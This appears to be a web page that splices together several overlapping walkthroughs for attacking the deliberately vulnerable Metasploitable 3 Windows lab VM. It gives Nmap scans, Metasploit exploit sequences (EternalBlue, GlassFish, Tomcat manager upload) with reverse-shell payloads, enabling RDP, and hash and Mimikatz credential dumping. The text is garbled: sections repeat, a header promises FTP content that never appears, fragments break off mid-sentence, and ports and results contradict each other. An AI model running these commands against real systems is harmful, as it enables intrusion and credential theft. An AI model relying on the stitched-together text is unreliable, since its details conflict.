Metasploitable 3 Windows Walkthrough ((new)) 〈UPDATED • 2025〉

Metasploitable 3 (Windows) is a deliberately vulnerable virtual machine based on Windows Server 2008 R2, designed to provide a safe, legal environment for practicing offensive security . Unlike its predecessor, it is built from a Rapid7 GitHub repository using automation tools. 1. Lab Setup and Deployment

To build the Windows environment, you typically need a hypervisor like VirtualBox and automation software: Prerequisites VirtualBox : Clone the repository and run build_win2008.ps1 (for Windows) or build_win2008.sh (for Linux/macOS). Deployment : After the build completes, run vagrant up to launch the VM. : The default credentials for the machine are vagrant/vagrant 2. Reconnaissance and Scanning

Once the VM is live, the first step is identifying its IP address and open services. Network Discovery netdiscover or an Nmap ping sweep ( nmap -sn [network] ) to find the target's IP. Service Enumeration

: Perform a comprehensive Nmap scan to identify vulnerable services: nmap -Pn -sV -p- [target-ip] Target Ports : Key ports often found open include 9200 (Elasticsearch) 3. Exploitation Scenarios

Metasploitable 3 includes multiple "flags" and vulnerabilities that range from misconfigurations to critical remote code execution (RCE) flaws.

Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21)

This walkthrough provides a comprehensive guide to setting up and exploiting Metasploitable 3, a Windows-based vulnerable virtual machine designed by Rapid7 for penetration testing practice. 1. Introduction to Metasploitable 3

Unlike its predecessor (Metasploitable 2), version 3 is built from the ground up using automation tools. It focuses on modern vulnerabilities found in Windows environments, specifically Windows Server 2008 R2. It’s an essential playground for learning lateral movement, service exploitation, and privilege escalation. 2. Lab Environment Setup Before you begin, ensure your lab environment is ready: Target: Metasploitable 3 (Windows) Attacker: Kali Linux

Network: Both VMs should be on a Host-Only or NAT Network to ensure they can communicate while remaining isolated from the internet. 3. Phase 1: Reconnaissance & Scanning Start by identifying the target IP and open services. Nmap Scan: nmap -sV -sC -O -p- Use code with caution. What to look for: Port 80/443/8080: HTTP services (IIS, Apache, GlassFish).

Port 445: SMB (Potential for EternalBlue or share enumeration). Port 3306: MySQL. Port 9200: Elasticsearch. 4. Phase 2: Exploitation Vectors Vector A: Exploiting HTTP (Port 8080 - GlassFish) metasploitable 3 windows walkthrough

Metasploitable 3 often runs a GlassFish server. This is a common entry point.

Search for Exploits: In Metasploit, search for glassfish_deployer. Configuration:

use exploit/multi/http/glassfish_deployer set RHOSTS set RPORT 8080 run Use code with caution. Result: If successful, you will gain a Meterpreter session. Vector B: Exploiting SMB (Port 445)

Since this is a Windows 2008 R2 machine, it might be vulnerable to MS17-010 (EternalBlue). Verify: Use auxiliary/scanner/smb/smb_ms17_010. Exploit:

use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run Use code with caution.

Result: This typically grants SYSTEM level access immediately. 5. Phase 3: Post-Exploitation & Privilege Escalation

If you gained access as a low-privilege user (e.g., through a web app), you need to escalate. Enumeration with Local Exploit Suggester: Background your session (Ctrl+Z). use post/multi/recon/local_exploit_suggester. set SESSION 1 and run.

Common Target: Look for AlwaysInstallElevated registry keys or unquoted service paths. 6. Phase 4: Looting and Persistence Once you have admin/SYSTEM access:

Dump Hashes: Use hashdump in Meterpreter to grab NTLM hashes. let's look at the next vector.

Mimikatz: Load the kiwi extension (load kiwi) to retrieve cleartext passwords from memory using creds_all.

Flags: Search the Administrator desktop and C:\ root for "flags" (usually .txt files) to complete the challenge. 7. Summary of Key Vulnerabilities Vulnerability Metasploit Module SMB exploit/windows/smb/ms17_010_eternalblue Elasticsearch RCE (CVE-2014-3120) exploit/multi/elasticsearch/script_static_eval Web Server ManageEngine Desktop Central exploit/windows/http/manageengine_connection_id_rce Conclusion

Metasploitable 3 Windows is a goldmine for practicing "living off the land" techniques and understanding how misconfigured Windows services lead to full domain compromise. Always remember to document your steps, as the goal is to improve your reporting as much as your hacking.

Metasploitable 3 (Windows), typically built on Windows Server 2008 R2, is designed with numerous misconfigurations and unpatched services for security testing . The standard login for this VM is vagrant / vagrant . Key Attack Vectors & Vulnerabilities

Metasploitable 3 (Windows) Write-up — Part [I]: FTP (PORT 21)

Here’s a structured text walkthrough for attacking Metasploitable 3 (Windows target) using Metasploit. This assumes you have Metasploitable 3 (Windows Server 2008 / Windows 2012) running and Kali Linux as the attacker.

---

3.1 EternalBlue (MS17-010) – Port 445

Check vulnerability:

nmap --script smb-vuln-ms17-010 -p445 192.168.56.105

Exploit using Metasploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.56.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.10   # Kali IP
run

Enable RDP

run post/windows/manage/enable_rdp

Introduction: Why Metasploitable 3?

In the world of ethical hacking, you need a safe, legal sandbox to test your skills. While Metasploitable 2 (Linux-based) has been the gold standard for over a decade, Metasploitable 3 is the modern evolution—a deliberately vulnerable Windows machine designed to teach real-world exploitation.

Unlike its predecessor, Metasploitable 3 runs on Windows Server 2008 R2 (or Windows 10/11 via Hyper-V) and includes hundreds of vulnerabilities: outdated software, weak passwords, misconfigured services, and unpatched kernel flaws.

This walkthrough will guide you step-by-step through:

1. Setting up Metasploitable 3 (the painful part).
2. Reconnaissance and enumeration.
3. Exploiting critical services (SMB, WinRM, MySQL, Tomcat).
4. Privilege escalation.
5. Post-exploitation and persistence.

Disclaimer: This guide is for educational purposes only. Only test systems you own or have explicit permission to assess.

---

2. Initial Reconnaissance

Nmap scan from Kali:

nmap -sV -sC -O -p- 192.168.56.102

Expected open ports (partial list):

• 135/tcp – MSRPC
• 139/tcp, 445/tcp – SMB
• 3389/tcp – RDP
• 5985/tcp – WinRM
• 8080/tcp – HTTP (possibly Apache or Jenkins)
• 47001/tcp – WinRM HTTP
• 49152-49156 – RPC dynamic ports

---

Attack Vector 2: Apache Tomcat (Port 8282)

This is a classic exploit. Tomcat is running on port 8282.

1. Navigate to http://<Target_IP>:8282/ in your browser.
2. Click on "Manager App." You will be prompted for a login.
3. Try default credentials. Username: tomcat, Password: tomcat.

You now have access to the Tomcat Manager. We can use this to upload a malicious JSP payload.

Using Metasploit for the Tomcat Exploit: Navigate to http://&lt

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <Target_IP>
set RPORT 8282
set HttpUsername tomcat
set HttpPassword tomcat
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <Your_IP>
run

Result: You should receive a Meterpreter session running as NT AUTHORITY\SYSTEM. You have already won! But for the sake of learning, let's look at the next vector.